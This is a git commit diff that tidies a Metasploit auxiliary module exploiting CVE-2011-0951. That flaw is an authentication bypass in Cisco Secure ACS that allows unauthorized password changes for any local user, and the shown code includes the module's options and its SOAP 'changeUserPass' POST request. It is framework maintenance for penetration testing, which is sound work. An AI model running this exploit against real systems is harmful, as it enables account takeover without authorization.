Make changes to proper API usage, whitespace, and extra characters.
This commit is contained in:
parent
3c683fcf99
commit
8b06835109
|
@ -17,28 +17,28 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
include Msf::Auxiliary::Report
|
include Msf::Auxiliary::Report
|
||||||
include Msf::Auxiliary::Scanner
|
include Msf::Auxiliary::Scanner
|
||||||
|
|
||||||
def initialize
|
def initialize(info = {})
|
||||||
super(
|
super(update_info(info,
|
||||||
'Name' => 'Cisco Secure ACS Version < 5.1.0.44.5 or 5.2.0.26.2 and Unauthorized Password Change',
|
'Name' => 'Cisco Secure ACS Version < 5.1.0.44.5 or 5.2.0.26.2 Unauthorized Password Change',
|
||||||
'Version' => '$Revision$',
|
'Version' => '$Revision$',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module exploits an authentication bypass issue which allows arbitrary
|
This module exploits an authentication bypass issue which allows arbitrary
|
||||||
password change requests to be issued for any user in the local store.
|
password change requests to be issued for any user in the local store.
|
||||||
Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well
|
Instances of Secure ACS running version 5.1 with patches 3, 4, or 5 as well
|
||||||
as version 5.2 with either no patches or patches 1 and 2 are vulnerable.
|
as version 5.2 with either no patches or patches 1 and 2 are vulnerable.
|
||||||
},
|
},
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
['BID', '47093'],
|
['BID', '47093'],
|
||||||
['CVE', 'CVE-2011-0951'],
|
['CVE', 'CVE-2011-0951'],
|
||||||
['URL', 'http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html'],
|
['URL', 'http://www.cisco.com/en/US/products/csa/cisco-sa-20110330-acs.html']
|
||||||
],
|
],
|
||||||
'Author' =>
|
'Author' =>
|
||||||
[
|
[
|
||||||
'Jason Kratzer<pyoor[at]flinkd.org>',
|
'Jason Kratzer<pyoor[at]flinkd.org>'
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE
|
'License' => MSF_LICENSE
|
||||||
)
|
))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
|
@ -46,7 +46,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
OptString.new('TARGETURI', [true, 'Path to UCP WebService', '/PI/services/UCP/']),
|
OptString.new('TARGETURI', [true, 'Path to UCP WebService', '/PI/services/UCP/']),
|
||||||
OptString.new('USERNAME', [true, 'Username to use', '']),
|
OptString.new('USERNAME', [true, 'Username to use', '']),
|
||||||
OptString.new('PASSWORD', [true, 'Password to use', '']),
|
OptString.new('PASSWORD', [true, 'Password to use', '']),
|
||||||
OptBool.new('SSL', [true, 'Use SSL', true],),
|
OptBool.new('SSL', [true, 'Use SSL', true],)
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
@ -80,12 +80,12 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
|
|
||||||
begin
|
begin
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => "#{datastore['TARGETURI']}",
|
'uri' => target_uri.path,
|
||||||
'method' => 'POST',
|
'method' => 'POST',
|
||||||
'data' => data,
|
'data' => data,
|
||||||
'headers' =>
|
'headers' =>
|
||||||
{
|
{
|
||||||
'SOAPAction' => '"changeUserPass"',
|
'SOAPAction' => '"changeUserPass"',
|
||||||
}
|
}
|
||||||
}, 60)
|
}, 60)
|
||||||
|
|
||||||
|
@ -112,7 +112,7 @@ class Metasploit4 < Msf::Auxiliary
|
||||||
end
|
end
|
||||||
else
|
else
|
||||||
print_error("#{rhost} - Failed! The webserver issued a #{res.code} response.")
|
print_error("#{rhost} - Failed! The webserver issued a #{res.code} response.")
|
||||||
print_error("Please validate the TARGETURI and try again.")
|
print_error("Please validate the TARGETURI option and try again.")
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
Loading…
Reference in New Issue